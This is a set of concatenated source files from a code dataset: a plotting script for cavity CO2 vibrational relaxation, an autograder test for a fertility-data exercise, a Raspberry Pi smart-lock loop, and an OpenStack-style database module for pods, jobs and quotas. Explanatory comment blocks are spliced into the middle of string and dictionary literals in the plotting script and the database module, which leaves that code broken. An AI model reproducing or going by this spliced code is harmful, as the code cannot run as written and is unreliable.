gather_IR_data(paths=paths_IR)\n ts, trajs = gather_relaxation_trajectory(paths=paths_VR)\n ts2, trajs2 = gather_relaxation_trajectory(paths=paths_VR, opposite=True)\n # photonic energy\n t, ph = prepare_ph_data(path=paths_VR[1])\n ph -= 0.000950037 * 2.0 # reduce the thermal energy\n\n # convert all atomic energies to hbar*omega_c, where omega_c = 2320.0 cm-1\n au2omega_c = 219474.63 / 2320.0\n trajs = [x*au2omega_c for x in trajs]\n trajs2= [x*au2omega_c for x in trajs2]\n ph *= au2omega_c\n\n colors = [\"k\", \"r\"]\n labels = [\"outside cavity\", \"inside cavity\"]\n axes = clp.initialize(1, 4, width=12.0, height=4.*0.618, LaTeX=True, fontsize=12, labelthem=True, labelthemPosition=[0.15, 0.95])\n sps[1] += 1.5 # inverse the outside cavity lineshape\n clp.plotone(freqs, sps, axes[0], xlim=[2000, 2600], xlabel=\"frequency [cm$^{-1}$]\",\n ylabel=\"$n(\\omega)\\\\alpha(\\omega)$ [arb. 
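# --- Hedged sketch of the finite-difference step inside prepare_ph_data above:
# np.gradient converts an evenly sampled coordinate trace into velocities via
# second-order central differences (2 fs spacing here, matching dtfs=2).
import numpy as np

dtfs = 2.0                                   # timestep [fs]
t = np.arange(0.0, 100.0, dtfs)
q = np.sin(0.1 * t)                          # toy coordinate trace
v = np.gradient(q, dtfs, axis=-1, edge_order=2)
# central differences track the analytic derivative 0.1*cos(0.1 t)
assert np.allclose(v[1:-1], 0.1 * np.cos(0.1 * t[1:-1]), atol=1e-2)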
units]\", colors=colors, labels=labels, showlegend=False, ylim=[-0.3, 4])\n clp.plotone(ts, trajs, axes[1], xlim=[-0.5, 40], ylim=[0, 0.03*au2omega_c], ylabel=\"V(C=O) - $k_B$T [$\\hbar\\omega_c$]\",\n xlabel=\"time [ps]\", colors=colors, labels=labels, lw=1.2, showlegend=False)\n clp.plotone(ts2, trajs2, axes[2], xlim=[-0.5, 40], ylim=[0, 0.001*au2omega_c], ylabel=\"V(C=O) - $k_B$T [$\\hbar\\omega_c$]\",\n xlabel=\"time [ps]\", colors=colors, labels=labels, showlegend=False, lw=1.2)\n clp.plotone([t[1::10]*1e-3], [ph[1::10]], axes[3], colors=[\"r\"], showlegend=False, xlim=[-0.5,40],\n ylabel=\"$E_{ph}$ - 2$k_B$T [$\\hbar\\omega_c$]\", xlabel=\"time [ps]\", ylim=[0, 0.006*au2omega_c], lw=1.2)\n\n axes[0].text(2010, 0.1, \"cavity off\", fontsize=12, color=\"k\")\n axes[0].text(2010, 1.6, \"cavity on\", fontsize=12, color=\"r\")\n axes[1].text(0.5, 0.8, \"hot molecules\", transform=axes[1].transAxes, fontsize=12, color=\"b\")\n axes[2].text(0.4, 0.1, \"thermal molecules\", transform=axes[2].transAxes, fontsize=12, color=\"b\")\n axes[3].text(0.4, 0.8, \"cavity photons\", transform=axes[3].transAxes, fontsize=12, color=\"b\")\n axes[0].axvline(x = 2320, ymin=0.0, ymax=3.0, ls='--', c=\"b\")\n\n clp.adjust(tight_layout=True, savefile=\"cavity_effect.pdf\")\n\n\nif __name__ == \"__main__\":\n plot_results()\n","repo_name":"TaoELi/cavmd_examples_co2","sub_path":"CO2_vib_relaxation/plot_cavity_effect.py","file_name":"plot_cavity_effect.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33649993670","text":"test = { 'name': 'q1_5',\n 'points': 3,\n 'suites': [ { 'cases': [ { 'code': '>>> # Hint: make sure the returned table has the labls:;\\n'\n \">>> # 'Year' and 'Children per woman';\\n\"\n \">>> assert fertility_over_time('usa', 2010).labels == ('Year', 'Children per woman')\\n\",\n 'hidden': False,\n 'locked': False},\n {'code': \">>> assert all(fertility_over_time('usa', 2010).column('Year') == np.arange(2010, 2016))\\n\", 'hidden': False, 'locked': False},\n {'code': \">>> assert all(fertility_over_time('usa', 2005).column('Year') == np.arange(2005, 2016))\\n\", 'hidden': False, 'locked': False}],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'}]}\n","repo_name":"alcullinen/materials-f20","sub_path":"projects/project1/tests/q1_5.py","file_name":"q1_5.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86724850584","text":"import pi_camera\nimport contract\nimport lock_control\nimport json\nimport signal\nfrom time import sleep\n\n\nwhile True:\n try:\n codes = pi_camera.capture_img()\n args = json.loads(codes, encoding='utf8')\n\n print('check can open door, args: %s' % codes)\n if contract.can_open_door(args):\n print('open door ...')\n lock_control.open_lock()\n sleep(3)\n else:\n print('no premission ...')\n except KeyboardInterrupt:\n print('Good bye')\n exit(0)\n except Exception as ex:\n print('some error ...')\n print(ex)\n","repo_name":"tw-bc-group/decentralized-smart-lock","sub_path":"LockController/pi_control.py","file_name":"pi_control.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21839085932","text":"import functools\nimport sqlalchemy as sql\nimport time\nimport uuid\n\nfrom oslo_config import cfg\nfrom oslo_db import exception as db_exc\nfrom 
oslo_log import log as logging\nfrom oslo_utils import timeutils\nfrom oslo_utils import uuidutils\nfrom sqlalchemy import or_, and_\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy.sql.expression import literal_column\n\nfrom newcloudo2o.common import constants\nfrom newcloudo2o.common.context import is_admin_context as _is_admin_context\nfrom newcloudo2o.common import exceptions\nfrom newcloudo2o.common.i18n import _\nfrom newcloudo2o.common.i18n import _LW\n\nfrom newcloudo2o.db import core\nfrom newcloudo2o.db import models\n\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\n\ndef create_pod(context, pod_dict):\n with context.session.begin():\n return core.create_resource(context, models.Pod, pod_dict)\n\n\ndef delete_pod(context, pod_id):\n with context.session.begin():\n return core.delete_resource(context, models.Pod, pod_id)\n\n\ndef get_pod(context, pod_id):\n with context.session.begin():\n return core.get_resource(context, models.Pod, pod_id)\n\n\ndef list_pods(context, filters=None, sorts=None):\n with context.session.begin():\n return core.query_resource(context, models.Pod, filters or [],\n sorts or [])\n\n\ndef update_pod(context, pod_id, update_dict):\n with context.session.begin():\n return core.update_resource(context, models.Pod, pod_id, update_dict)\n\n\ndef create_pod_service_configuration(context, config_dict):\n with context.session.begin():\n return core.create_resource(context, models.PodServiceConfiguration,\n config_dict)\n\n\ndef delete_pod_service_configuration(context, config_id):\n with context.session.begin():\n return core.delete_resource(context, models.PodServiceConfiguration,\n config_id)\n\n\ndef get_pod_service_configuration(context, config_id):\n with context.session.begin():\n return core.get_resource(context, models.PodServiceConfiguration,\n config_id)\n\n\ndef list_pod_service_configurations(context, filters=None, sorts=None):\n with context.session.begin():\n return core.query_resource(context, models.PodServiceConfiguration,\n filters or [], sorts or [])\n\n\ndef update_pod_service_configuration(context, config_id, update_dict):\n with context.session.begin():\n return core.update_resource(\n context, models.PodServiceConfiguration, config_id, update_dict)\n\n\ndef get_bottom_mappings_by_top_id(context, top_id, resource_type):\n \"\"\"Get resource id and pod name on bottom\n\n :param context: context object\n :param top_id: resource id on top\n :param resource_type: resource type\n :return: a list of tuple (pod dict, bottom_id)\n \"\"\"\n route_filters = [{'key': 'top_id', 'comparator': 'eq', 'value': top_id},\n {'key': 'resource_type',\n 'comparator': 'eq',\n 'value': resource_type}]\n mappings = []\n with context.session.begin():\n routes = core.query_resource(\n context, models.ResourceRouting, route_filters, [])\n for route in routes:\n if not route['bottom_id']:\n continue\n pod = core.get_resource(context, models.Pod, route['pod_id'])\n mappings.append((pod, route['bottom_id']))\n return mappings\n\n\ndef get_bottom_id_by_top_id_pod_name(context, top_id, pod_name, resource_type):\n \"\"\"Get resource bottom id by top id and bottom pod name\n\n :param context: context object\n :param top_id: resource id on top\n :param pod_name: name of bottom pod\n :param resource_type: resource type\n :return:\n \"\"\"\n mappings = get_bottom_mappings_by_top_id(context, top_id, resource_type)\n for pod, bottom_id in mappings:\n if pod['pod_name'] == pod_name:\n return bottom_id\n return None\n\n\ndef 
get_bottom_mappings_by_tenant_pod(context,\n tenant_id,\n pod_id,\n resource_type):\n \"\"\"Get resource routing for specific tenant and pod\n\n :param context: context object\n :param tenant_id: tenant id to look up\n :param pod_id: pod to look up\n :param resource_type: specific resource\n :return: a dic {top_id : route}\n \"\"\"\n route_filters = [{'key': 'pod_id',\n 'comparator': 'eq',\n 'value': pod_id},\n {'key': 'project_id',\n 'comparator': 'eq',\n 'value': tenant_id},\n {'key': 'resource_type',\n 'comparator': 'eq',\n 'value': resource_type}]\n routings = {}\n with context.session.begin():\n routes = core.query_resource(\n context, models.ResourceRouting, route_filters, [])\n for _route in routes:\n if not _route['bottom_id']:\n continue\n routings[_route['top_id']] = _route\n return routings\n\n\ndef get_next_bottom_pod(context, current_pod_id=None):\n pods = list_pods(context, sorts=[(models.Pod.pod_id, True)])\n # NOTE(zhiyuan) number of pods is small, just traverse to filter top pod\n pods = [pod for pod in pods if pod['az_name']]\n for index, pod in enumerate(pods):\n if not current_pod_id:\n return pod\n if pod['pod_id'] == current_pod_id and index < len(pods) - 1:\n return pods[index + 1]\n return None\n\n\ndef get_top_pod(context):\n\n filters = [{'key': 'az_name', 'comparator': 'eq', 'value': ''}]\n pods = list_pods(context, filters=filters)\n\n # only one should be searched\n for pod in pods:\n if (pod['pod_name'] != '') and \\\n (pod['az_name'] == ''):\n return pod\n\n return None\n\n\ndef get_pod_by_name(context, pod_name):\n\n filters = [{'key': 'pod_name', 'comparator': 'eq', 'value': pod_name}]\n pods = list_pods(context, filters=filters)\n\n # only one should be searched\n for pod in pods:\n if pod['pod_name'] == pod_name:\n return pod\n\n return None\n\n\ndef new_job(context, _type, resource_id):\n with context.session.begin():\n job_dict = {'id': uuidutils.generate_uuid(),\n 'type': _type,\n 'status': constants.JS_New,\n 'resource_id': resource_id,\n 'extra_id': uuidutils.generate_uuid()}\n job = core.create_resource(context, models.Job, job_dict)\n return job\n\n\ndef register_job(context, _type, resource_id):\n try:\n context.session.begin()\n job_dict = {'id': uuidutils.generate_uuid(),\n 'type': _type,\n 'status': constants.JS_Running,\n 'resource_id': resource_id,\n 'extra_id': constants.SP_EXTRA_ID}\n job = core.create_resource(context, models.Job, job_dict)\n context.session.commit()\n return job\n except db_exc.DBDuplicateEntry:\n context.session.rollback()\n return None\n except db_exc.DBDeadlock:\n context.session.rollback()\n return None\n finally:\n context.session.close()\n\n\ndef get_latest_failed_jobs(context):\n jobs = []\n query = context.session.query(models.Job.type, models.Job.resource_id,\n sql.func.count(models.Job.id))\n query = query.group_by(models.Job.type, models.Job.resource_id)\n for job_type, resource_id, count in query:\n _query = context.session.query(models.Job)\n _query = _query.filter_by(type=job_type, resource_id=resource_id)\n _query = _query.order_by(sql.desc('timestamp'))\n # when timestamps of job entries are the same, sort entries by status\n # so \"Fail\" job is placed before \"New\" and \"Success\" jobs\n _query = _query.order_by(sql.asc('status'))\n latest_job = _query[0].to_dict()\n if latest_job['status'] == constants.JS_Fail:\n jobs.append(latest_job)\n return jobs\n\n\ndef get_latest_timestamp(context, status, _type, resource_id):\n jobs = core.query_resource(\n context, models.Job,\n [{'key': 'status', 
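# --- Hedged illustration (plain Python, no database): the filter lists passed
# to core.query_resource throughout this module are key/comparator/value dicts.
# For the 'eq' comparator, which is the only one used in this file, the
# semantics amount to:
def apply_filters(rows, filters):
    for spec in filters:
        if spec["comparator"] == "eq":
            rows = [r for r in rows if r.get(spec["key"]) == spec["value"]]
    return rows

rows = [
    {"top_id": "t1", "resource_type": "network"},
    {"top_id": "t1", "resource_type": "port"},
]
specs = [
    {"key": "top_id", "comparator": "eq", "value": "t1"},
    {"key": "resource_type", "comparator": "eq", "value": "port"},
]
assert apply_filters(rows, specs) == [{"top_id": "t1", "resource_type": "port"}]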
'comparator': 'eq', 'value': status},\n {'key': 'type', 'comparator': 'eq', 'value': _type},\n {'key': 'resource_id', 'comparator': 'eq', 'value': resource_id}],\n [('timestamp', False)])\n if jobs:\n return jobs[0]['timestamp']\n else:\n return None\n\n\ndef get_running_job(context, _type, resource_id):\n jobs = core.query_resource(\n context, models.Job,\n [{'key': 'resource_id', 'comparator': 'eq', 'value': resource_id},\n {'key': 'status', 'comparator': 'eq', 'value': constants.JS_Running},\n {'key': 'type', 'comparator': 'eq', 'value': _type}], [])\n if jobs:\n return jobs[0]\n else:\n return None\n\n\ndef finish_job(context, job_id, successful, timestamp):\n status = constants.JS_Success if successful else constants.JS_Fail\n with context.session.begin():\n job_dict = {'status': status,\n 'timestamp': timestamp,\n 'extra_id': uuidutils.generate_uuid()}\n core.update_resource(context, models.Job, job_id, job_dict)\n\n\n_DEFAULT_QUOTA_NAME = 'default'\n\n\ndef _is_user_context(context):\n \"\"\"Indicates if the request context is a normal user.\"\"\"\n if not context:\n return False\n if context.is_admin:\n return False\n if not context.user_id or not context.project_id:\n return False\n return True\n\n\ndef authorize_quota_class_context(context, class_name):\n \"\"\"Ensures a request has permission to access the given quota class.\"\"\"\n if _is_user_context(context):\n if not context.quota_class:\n raise exceptions.NotAuthorized()\n elif context.quota_class != class_name:\n raise exceptions.NotAuthorized()\n\n\ndef authorize_project_context(context, project_id):\n \"\"\"Ensures a request has permission to access the given project.\"\"\"\n if _is_user_context(context):\n if not context.project_id:\n raise exceptions.NotAuthorized()\n elif context.project_id != project_id:\n raise exceptions.NotAuthorized()\n\n\ndef authorize_user_context(context, user_id):\n \"\"\"Ensures a request has permission to access the given user.\"\"\"\n if _is_user_context(context):\n if not context.user_id:\n raise exceptions.NotAuthorized()\n elif context.user_id != user_id:\n raise exceptions.NotAuthorized()\n\n\ndef require_admin_context(f):\n \"\"\"Decorator to require admin request context.\n\n The first argument to the wrapped function must be the context.\n\n \"\"\"\n\n def wrapper(*args, **kwargs):\n if not _is_admin_context(args[0]):\n raise exceptions.AdminRequired()\n return f(*args, **kwargs)\n return wrapper\n\n\ndef require_context(f):\n \"\"\"Decorator to require *any* user or admin context.\n\n This does no authorization for user or project access matching, see\n :py:func:`authorize_project_context` and\n :py:func:`authorize_user_context`.\n\n The first argument to the wrapped function must be the context.\n\n \"\"\"\n\n def wrapper(*args, **kwargs):\n if not _is_admin_context(args[0]) and not _is_user_context(args[0]):\n raise exceptions.NotAuthorized()\n return f(*args, **kwargs)\n return wrapper\n\n\ndef _retry_on_deadlock(f):\n \"\"\"Decorator to retry a DB API call if Deadlock was received.\"\"\"\n @functools.wraps(f)\n def wrapped(*args, **kwargs):\n while True:\n try:\n return f(*args, **kwargs)\n except db_exc.DBDeadlock:\n LOG.warning(_LW(\"Deadlock detected when running \"\n \"'%(func_name)s': Retrying...\"),\n dict(func_name=f.__name__))\n # Retry!\n time.sleep(0.5)\n continue\n functools.update_wrapper(wrapped, f)\n return wrapped\n\n\ndef handle_db_data_error(f):\n def wrapper(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except db_exc.DBDataError:\n msg = _('Error 
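# --- Hedged generalization of _retry_on_deadlock above: the same
# catch/log/sleep/retry shape, with DBDeadlock swapped for a generic exception
# class so the sketch runs without oslo.db. Unlike the module's loop, this one
# bounds the number of attempts instead of retrying forever.
import functools
import time

def retry_on(exc_type, delay=0.5, attempts=5):
    def decorator(f):
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            for attempt in range(attempts):
                try:
                    return f(*args, **kwargs)
                except exc_type:
                    if attempt == attempts - 1:
                        raise            # out of retries, surface the error
                    time.sleep(delay)
        return wrapped
    return decorator

calls = {"n": 0}

@retry_on(RuntimeError, delay=0.0)
def flaky():
    calls["n"] += 1
    if calls["n"] < 3:
        raise RuntimeError("transient deadlock stand-in")
    return "ok"

assert flaky() == "ok" and calls["n"] == 3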
writing field to database')\n LOG.exception(msg)\n raise exceptions.Invalid(msg)\n except Exception as e:\n LOG.exception(str(e))\n raise\n\n return wrapper\n\n\ndef model_query(context, *args, **kwargs):\n \"\"\"Query helper that accounts for context's `read_deleted` field.\n\n :param context: context to query under\n :param session: if present, the session to use\n :param read_deleted: if present, overrides context's read_deleted field.\n :param project_only: if present and context is user-type, then restrict\n query to match the context's project_id.\n \"\"\"\n session = kwargs.get('session') or context.session\n read_deleted = kwargs.get('read_deleted') or context.read_deleted\n project_only = kwargs.get('project_only')\n\n query = session.query(*args)\n\n if read_deleted == 'no':\n query = query.filter_by(deleted=False)\n elif read_deleted == 'yes':\n pass # omit the filter to include deleted and active\n elif read_deleted == 'only':\n query = query.filter_by(deleted=True)\n elif read_deleted == 'int_no':\n query = query.filter_by(deleted=0)\n else:\n raise Exception(\n _(\"Unrecognized read_deleted value '%s'\") % read_deleted)\n\n if project_only and _is_user_context(context):\n query = query.filter_by(project_id=context.project_id)\n\n return query\n\n\n@require_context\ndef _quota_get(context, project_id, resource, session=None):\n result = model_query(context, models.Quotas, session=session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n filter_by(resource=resource).\\\n first()\n\n if not result:\n raise exceptions.ProjectQuotaNotFound(project_id=project_id)\n\n return result\n\n\n@require_context\ndef quota_get(context, project_id, resource):\n return _quota_get(context, project_id, resource)\n\n\n@require_context\ndef quota_get_all_by_project(context, project_id):\n authorize_project_context(context, project_id)\n\n rows = model_query(context, models.Quotas, read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n result = {'project_id': project_id}\n for row in rows:\n result[row.resource] = row.hard_limit\n\n return result\n\n\n@require_context\ndef quota_allocated_get_all_by_project(context, project_id):\n rows = model_query(context, models.Quotas, read_deleted='no').filter_by(\n project_id=project_id).all()\n result = {'project_id': project_id}\n for row in rows:\n result[row.resource] = row.allocated\n return result\n\n\n@require_admin_context\ndef quota_create(context, project_id, resource, limit, allocated=0):\n quota_ref = models.Quotas()\n quota_ref.project_id = project_id\n quota_ref.resource = resource\n quota_ref.hard_limit = limit\n if allocated:\n quota_ref.allocated = allocated\n\n session = core.get_session()\n with session.begin():\n quota_ref.save(session)\n return quota_ref\n\n\n@require_admin_context\ndef quota_update(context, project_id, resource, limit):\n with context.session.begin():\n quota_ref = _quota_get(context, project_id, resource,\n session=context.session)\n quota_ref.hard_limit = limit\n return quota_ref\n\n\n@require_admin_context\ndef quota_allocated_update(context, project_id, resource, allocated):\n with context.session.begin():\n quota_ref = _quota_get(context, project_id, resource,\n session=context.session)\n quota_ref.allocated = allocated\n return quota_ref\n\n\n@require_admin_context\ndef quota_destroy(context, project_id, resource):\n with context.session.begin():\n quota_ref = _quota_get(context, project_id, resource,\n session=context.session)\n 
quota_ref.delete(session=context.session)\n\n\n@require_context\ndef _quota_class_get(context, class_name, resource, session=None):\n result = model_query(context, models.QuotaClasses, session=session,\n read_deleted=\"no\").\\\n filter_by(class_name=class_name).\\\n filter_by(resource=resource).\\\n first()\n\n if not result:\n raise exceptions.QuotaClassNotFound(class_name=class_name)\n\n return result\n\n\n@require_context\ndef quota_class_get(context, class_name, resource):\n return _quota_class_get(context, class_name, resource)\n\n\ndef quota_class_get_default(context):\n rows = model_query(context, models.QuotaClasses,\n read_deleted=\"no\").\\\n filter_by(class_name=_DEFAULT_QUOTA_NAME).all()\n\n result = {'class_name': _DEFAULT_QUOTA_NAME}\n for row in rows:\n result[row.resource] = row.hard_limit\n\n return result\n\n\n@require_context\ndef quota_class_get_all_by_name(context, class_name):\n authorize_quota_class_context(context, class_name)\n\n rows = model_query(context, models.QuotaClasses, read_deleted=\"no\").\\\n filter_by(class_name=class_name).\\\n all()\n\n result = {'class_name': class_name}\n for row in rows:\n result[row.resource] = row.hard_limit\n\n return result\n\n\n@require_admin_context\ndef quota_class_create(context, class_name, resource, limit):\n quota_class_ref = models.QuotaClasses()\n quota_class_ref.class_name = class_name\n quota_class_ref.resource = resource\n quota_class_ref.hard_limit = limit\n\n session = core.get_session()\n with session.begin():\n quota_class_ref.save(session)\n return quota_class_ref\n\n\n@require_admin_context\ndef quota_class_update(context, class_name, resource, limit):\n with context.session.begin():\n quota_class_ref = _quota_class_get(context, class_name, resource,\n session=context.session)\n quota_class_ref.hard_limit = limit\n\n return quota_class_ref\n\n\n@require_admin_context\ndef quota_class_destroy(context, class_name, resource):\n with context.session.begin():\n quota_class_ref = _quota_class_get(context, class_name, resource,\n session=context.session)\n quota_class_ref.delete(session=context.session)\n\n\n@require_admin_context\ndef quota_class_destroy_all_by_name(context, class_name):\n with context.session.begin():\n quota_classes = model_query(context, models.QuotaClasses,\n session=context.session,\n read_deleted=\"no\").\\\n filter_by(class_name=class_name).\\\n all()\n\n for quota_class_ref in quota_classes:\n quota_class_ref.delete(session=context.session)\n\n\n@require_context\ndef quota_usage_get(context, project_id, resource):\n result = model_query(context, models.QuotaUsages, read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n filter_by(resource=resource).\\\n first()\n\n if not result:\n raise exceptions.QuotaUsageNotFound(project_id=project_id)\n\n return result\n\n\n@require_context\ndef quota_usage_get_all_by_project(context, project_id):\n authorize_project_context(context, project_id)\n\n rows = model_query(context, models.QuotaUsages, read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n result = {'project_id': project_id}\n for row in rows:\n result[row.resource] = dict(in_use=row.in_use, reserved=row.reserved)\n\n return result\n\n\n@require_admin_context\ndef _quota_usage_create(context, project_id, resource, in_use, reserved,\n until_refresh, session=None):\n\n quota_usage_ref = models.QuotaUsages()\n quota_usage_ref.project_id = project_id\n quota_usage_ref.resource = resource\n quota_usage_ref.in_use = in_use\n quota_usage_ref.reserved = reserved\n 
quota_usage_ref.until_refresh = until_refresh\n quota_usage_ref.save(session=session)\n\n return quota_usage_ref\n\n\ndef _reservation_create(context, uuid, usage, project_id, resource, delta,\n expire, session=None):\n reservation_ref = models.Reservation()\n reservation_ref.uuid = uuid\n reservation_ref.usage_id = usage['id']\n reservation_ref.project_id = project_id\n reservation_ref.resource = resource\n reservation_ref.delta = delta\n reservation_ref.expire = expire\n reservation_ref.save(session=session)\n\n return reservation_ref\n\n\n# NOTE(johannes): The quota code uses SQL locking to ensure races don't\n# cause under or over counting of resources. To avoid deadlocks, this\n# code always acquires the lock on quota_usages before acquiring the lock\n# on reservations.\n\ndef _get_quota_usages(context, session, project_id):\n # Broken out for testability\n rows = model_query(context, models.QuotaUsages,\n read_deleted=\"no\",\n session=session).\\\n filter_by(project_id=project_id).\\\n with_lockmode('update').\\\n all()\n return {row.resource: row for row in rows}\n\n\ndef _get_quota_usages_by_resource(context, session, project_id, resource):\n # TODO(joehuang), add user_id as part of the filter\n rows = model_query(context, models.QuotaUsages,\n read_deleted=\"no\",\n session=session).\\\n filter_by(project_id=project_id).\\\n filter_by(resource=resource).\\\n with_lockmode('update').\\\n all()\n return {row.resource: row for row in rows}\n\n\n@require_context\n@_retry_on_deadlock\ndef quota_reserve(context, resources, quotas, deltas, expire,\n until_refresh, max_age, project_id=None):\n elevated = context.elevated()\n with context.session.begin():\n if project_id is None:\n project_id = context.project_id\n\n # Get the current usages\n usages = _get_quota_usages(context, context.session, project_id)\n\n # Handle usage refresh\n refresh = False\n work = set(deltas.keys())\n while work:\n resource = work.pop()\n\n # Do we need to refresh the usage?\n if resource not in usages:\n usages[resource] = _quota_usage_create(elevated,\n project_id,\n resource,\n 0, 0,\n until_refresh or None,\n session=context.session)\n refresh = True\n elif usages[resource].in_use < 0:\n # Negative in_use count indicates a desync, so try to\n # heal from that...\n refresh = True\n elif usages[resource].until_refresh is not None:\n usages[resource].until_refresh -= 1\n if usages[resource].until_refresh <= 0:\n refresh = True\n elif max_age and usages[resource].updated_at is not None and (\n (usages[resource].updated_at -\n timeutils.utcnow()).seconds >= max_age):\n refresh = True\n\n if refresh:\n # no actural usage refresh here\n\n # refresh from the bottom pod\n usages[resource].until_refresh = until_refresh or None\n\n # Because more than one resource may be refreshed\n # by the call to the sync routine, and we don't\n # want to double-sync, we make sure all refreshed\n # resources are dropped from the work set.\n work.discard(resource)\n\n # NOTE(Vek): We make the assumption that the sync\n # routine actually refreshes the\n # resources that it is the sync routine\n # for. 
We don't check, because this is\n # a best-effort mechanism.\n\n # Check for deltas that would go negative\n unders = [r for r, delta in deltas.items()\n if delta < 0 and delta + usages[r].in_use < 0]\n\n # Now, let's check the quotas\n # NOTE(Vek): We're only concerned about positive increments.\n # If a project has gone over quota, we want them to\n # be able to reduce their usage without any\n # problems.\n overs = [r for r, delta in deltas.items()\n if quotas[r] >= 0 and delta >= 0 and\n quotas[r] < delta + usages[r].in_use + usages[r].reserved]\n\n # NOTE(Vek): The quota check needs to be in the transaction,\n # but the transaction doesn't fail just because\n # we're over quota, so the OverQuota raise is\n # outside the transaction. If we did the raise\n # here, our usage updates would be discarded, but\n # they're not invalidated by being over-quota.\n\n # Create the reservations\n if not overs:\n reservations = []\n for resource, delta in deltas.items():\n reservation = _reservation_create(elevated,\n str(uuid.uuid4()),\n usages[resource],\n project_id,\n resource, delta, expire,\n session=context.session)\n reservations.append(reservation.uuid)\n\n # Also update the reserved quantity\n # NOTE(Vek): Again, we are only concerned here about\n # positive increments. Here, though, we're\n # worried about the following scenario:\n #\n # 1) User initiates resize down.\n # 2) User allocates a new instance.\n # 3) Resize down fails or is reverted.\n # 4) User is now over quota.\n #\n # To prevent this, we only update the\n # reserved value if the delta is positive.\n if delta > 0:\n usages[resource].reserved += delta\n\n if unders:\n LOG.warning(_LW(\"Change will make usage less than 0 for the following \"\n \"resources: %s\"), unders)\n if overs:\n usages = {k: dict(in_use=v['in_use'], reserved=v['reserved'])\n for k, v in usages.items()}\n raise exceptions.OverQuota(overs=sorted(overs), quotas=quotas,\n usages=usages)\n\n return reservations\n\n\ndef _quota_reservations(session, context, reservations):\n \"\"\"Return the relevant reservations.\"\"\"\n\n # Get the listed reservations\n return model_query(context, models.Reservation,\n read_deleted=\"no\",\n session=session).\\\n filter(models.Reservation.uuid.in_(reservations)).\\\n with_lockmode('update').\\\n all()\n\n\n@require_context\n@_retry_on_deadlock\ndef reservation_commit(context, reservations, project_id=None):\n with context.session.begin():\n usages = _get_quota_usages(context, context.session, project_id)\n\n for reservation in _quota_reservations(context.session,\n context,\n reservations):\n usage = usages[reservation.resource]\n if reservation.delta >= 0:\n usage.reserved -= reservation.delta\n usage.in_use += reservation.delta\n\n reservation.delete(session=context.session)\n\n\n@require_context\n@_retry_on_deadlock\ndef reservation_rollback(context, reservations, project_id=None):\n with context.session.begin():\n usages = _get_quota_usages(context, context.session, project_id)\n\n for reservation in _quota_reservations(context.session,\n context,\n reservations):\n usage = usages[reservation.resource]\n if reservation.delta >= 0:\n usage.reserved -= reservation.delta\n\n reservation.delete(session=context.session)\n\n\ndef quota_destroy_by_project(*args, **kwargs):\n \"\"\"Destroy all limit quotas associated with a project.\n\n Leaves usage and reservation quotas intact.\n \"\"\"\n quota_destroy_all_by_project(only_quotas=True, *args, **kwargs)\n\n\n@require_admin_context\n@_retry_on_deadlock\ndef 
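# --- Hedged sketch of the core check in quota_reserve above, on plain dicts
# instead of QuotaUsages rows: a positive delta is "over" when it would push
# in_use + reserved past the limit, and a negative delta is "under" when it
# would drive in_use below zero.
quotas = {"instances": 10}
in_use = {"instances": 8}
reserved = {"instances": 1}
deltas = {"instances": 2}

overs = [r for r, d in deltas.items()
         if quotas[r] >= 0 and d >= 0 and quotas[r] < d + in_use[r] + reserved[r]]
unders = [r for r, d in deltas.items() if d < 0 and d + in_use[r] < 0]

assert overs == ["instances"] and unders == []   # 10 < 2 + 8 + 1, so reject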
quota_destroy_all_by_project(context, project_id, only_quotas=False):\n \"\"\"Destroy all quotas associated with a project.\n\n This includes limit quotas, usage quotas and reservation quotas.\n Optionally can only remove limit quotas and leave other types as they are.\n\n :param context: The request context, for access checks.\n :param project_id: The ID of the project being deleted.\n :param only_quotas: Only delete limit quotas, leave other types intact.\n \"\"\"\n with context.session.begin():\n quotas = model_query(context, models.Quotas, session=context.session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n for quota_ref in quotas:\n quota_ref.delete(session=context.session)\n\n if only_quotas:\n return\n\n quota_usages = model_query(context, models.QuotaUsages,\n session=context.session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n for quota_usage_ref in quota_usages:\n quota_usage_ref.delete(session=context.session)\n\n reservations = model_query(context, models.Reservation,\n session=context.session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n for reservation_ref in reservations:\n reservation_ref.delete(session=context.session)\n\n\n@require_admin_context\n@_retry_on_deadlock\ndef reservation_expire(context):\n with context.session.begin():\n current_time = timeutils.utcnow()\n results = model_query(context, models.Reservation,\n session=context.session,\n read_deleted=\"no\").\\\n filter(models.Reservation.expire < current_time).\\\n all()\n\n if results:\n for reservation in results:\n if reservation.delta >= 0:\n reservation.usage.reserved -= reservation.delta\n reservation.usage.save(session=context.session)\n\n reservation.delete(session=context.session)\n\n\ndef _dict_with_extra_specs_if_authorized(context, inst_type_query):\n \"\"\"Convert type query result to dict with extra_spec and rate_limit.\n\n Takes a volume type query returned by sqlalchemy and returns it\n as a dictionary, converting the extra_specs entry from a list\n of dicts.\n\n NOTE:\n the contents of extra-specs are admin readable only.\n If the context passed in for this request is not about admin,\n we will return an empty extra-specs dict rather than\n providing extra-specs details.\n\n :param context: The request context, for access checks.\n :param inst_type_query: list of extra-specs.\n :returns dictionary of extra-specs.\n\n Example of response of admin context:\n\n 'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]\n to a single dict:\n 'extra_specs' : {'k1': 'v1'}\n\n \"\"\"\n\n inst_type_dict = dict(inst_type_query)\n if not context.is_admin:\n del (inst_type_dict['extra_specs'])\n else:\n extra_specs = {x['key']: 